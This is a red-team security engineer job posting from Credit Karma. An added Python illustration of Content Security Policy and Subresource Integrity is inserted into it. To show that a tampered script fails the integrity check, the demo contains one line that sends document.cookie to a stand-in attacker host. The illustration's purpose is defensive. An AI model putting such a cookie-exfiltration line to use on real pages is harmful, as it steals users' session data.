Staff Security Engineer - Red Team

  • Credit Karma
  • San Francisco, CA, USA
  • Mar 25, 2022
Full time · Developer · Java · Security

Job Description

Security is a core value at Credit Karma. We help millions of people better manage their credit. Safeguarding their sensitive information is critical to our continued success. From the CEO down to each individual developer, everyone views security as a personal responsibility. The successful candidate should understand basic concepts such as networking, applications, and operating system functionality and be able to learn advanced concepts such as application manipulation, exploit development, and stealthy operations. Your unique mission as a Red Team Staff Engineer is to identify potential weaknesses in the foundational infrastructure and core application and strategically reinforce them, enabling the engineering team to focus fiercely on new features. The assessments will drive the company’s ability to protect, detect and respond to cyber-attacks.

What You'll Do

  • Lead and deliver the red team assessments.
  • Perform network penetration, web and mobile application testing, source code reviews, threat analysis, wireless network assessments, and social-engineering assessments.
  • Assist with scoping prospective engagements, leading engagements from kickoff through remediation, and mentoring less experienced staff.
  • Execute controlled assessments, conduct attack/vulnerability research, work to evade detection mechanisms in place and address weaknesses through strategic partnerships around the organization.
  • Represent a contrarian perspective of security strategies, controls and defenses in order to identify previously undetected gaps or weaknesses.
  • Use techniques that probe and circumvent technical and operational controls to demonstrate a realistic compromise, and show how deliberate disruption could cause financial loss or other appreciable harm to Credit Karma and its members, partners and other stakeholders.
  • Support vulnerability remediation by recommending holistic solutions instead of brittle point-fixes.
  • Refactor the existing codebase to leverage new security framework capabilities, with an eye toward the transition from a monolithic to a service-oriented architecture.
  • Understand and deploy security standards at an organizational scale (e.g. Content Security Policy (CSP), Subresource Integrity (SRI)).
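As an added illustration of the two browser-side standards named above, and not code from the job posting or from Credit Karma: the snippet below computes an SRI `integrity` value for a script's bytes, checks served bytes against an integrity attribute the way a browser does (several hashes may be listed, any single match is accepted, unknown algorithms are ignored), and builds a nonce-based CSP header plus the matching `<script>` tag. The sample script body and the CDN hostname are constructed for the example.

```python
import base64
import binascii
import hashlib
import hmac
import html
import secrets

# Constructed sample script body (not from the page); in practice, the exact
# bytes of the file that the CDN serves.
SAMPLE_SCRIPT = b"console.log('hello from cdn');\n"
CDN_ORIGIN = "https://cdn.example.com"  # assumed hostname for the example

SRI_ALGOS = ("sha256", "sha384", "sha512")  # the only algorithms SRI permits


def sri_integrity(content: bytes, algo: str = "sha384") -> str:
    """Return an SRI integrity value such as 'sha384-<base64 digest>'."""
    if algo not in SRI_ALGOS:
        raise ValueError("SRI permits only sha256, sha384 or sha512")
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def sri_matches(content: bytes, integrity: str) -> bool:
    """Browser-style check: the attribute is a whitespace-separated list of
    hashes; tokens with unknown algorithms or malformed base64 are skipped,
    and the resource is accepted if any remaining hash matches."""
    for token in integrity.split():
        algo, _, b64 = token.partition("-")
        if algo not in SRI_ALGOS:
            continue
        try:
            expected = base64.b64decode(b64, validate=True)
        except (binascii.Error, ValueError):
            continue
        actual = hashlib.new(algo, content).digest()
        # Constant-time comparison; not strictly needed for public hashes,
        # but a good habit for any digest comparison.
        if hmac.compare_digest(expected, actual):
            return True
    return False


def new_nonce() -> str:
    """Per-response nonce: unguessable and never reused across responses."""
    return base64.b64encode(secrets.token_bytes(16)).decode("ascii")


def csp_header(nonce: str) -> str:
    """A restrictive baseline policy: only nonced or same-origin scripts, no
    plugins, and no base-tag hijacking of relative URLs."""
    return (
        "default-src 'self'; "
        f"script-src 'self' 'nonce-{nonce}' {CDN_ORIGIN}; "
        "object-src 'none'; "
        "base-uri 'self'; "
        "frame-ancestors 'none'"
    )


def script_tag(src: str, content: bytes, nonce: str) -> str:
    """Script tag pinned by SRI and allowed by the nonce in the CSP header.
    crossorigin="anonymous" is required for SRI on cross-origin resources."""
    return (
        f'<script src="{html.escape(src, quote=True)}" '
        f'integrity="{sri_integrity(content)}" '
        f'crossorigin="anonymous" nonce="{html.escape(nonce, quote=True)}"></script>'
    )


if __name__ == "__main__":
    nonce = new_nonce()
    print("Content-Security-Policy:", csp_header(nonce))
    print(script_tag(f"{CDN_ORIGIN}/app.js", SAMPLE_SCRIPT, nonce))
    tampered = SAMPLE_SCRIPT + b"fetch('https://attacker.invalid/?c='+document.cookie);\n"
    print("original accepted:", sri_matches(SAMPLE_SCRIPT, sri_integrity(SAMPLE_SCRIPT)))
    print("tampered accepted:", sri_matches(tampered, sri_integrity(SAMPLE_SCRIPT)))
```

The point of pairing the two controls: CSP decides which script sources may run at all, while SRI ensures that a permitted source (a CDN you do not operate) still cannot serve modified bytes. Rolling either out at organizational scale normally starts in report-only mode (`Content-Security-Policy-Report-Only`) to surface breakage before enforcing.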

What We Expect

  • Minimum 8 years of security experience, as both a builder and a breaker, in the following: mobile and web application assessments; network penetration testing and manipulation of network infrastructure; email, phone, or physical social-engineering assessments; developing, extending, or modifying exploits, shellcode or exploit tools; reverse engineering malware, data obfuscators, or ciphers; cloud security and security architecture, including GCP security controls.
  • Experience delivering reports and presenting findings, specifically to technical IT and management.
  • Technical depth in many, if not most of the following areas: LAMP stack, Node.js, Scala/Java, mobile, PKI, HTTP-based SOA/microservices, encryption, hashing, tokenization, secure randomness, Hardware Security Modules (HSMs), canonicalization, output encoding, message-based security, rate-limiting, anti-automation, role-based access control (RBAC), and large-scale data transport.
  • Working knowledge of all vulnerability classes on the OWASP Periodic Table of Vulnerabilities, with strong conceptualization of designs that make it impossible for developers to introduce those vulnerabilities.
  • Thorough understanding of InfoSec control frameworks and how they can be realistically implemented.
  • Source code review for control-flow and security flaws.
  • Thought leadership in the security field, with demonstrable contributions to industry groups.
  • Artful communication skills and organizational savvy to steer peers and leadership toward solutions that carefully balance business, risk, compliance, and engineering concerns.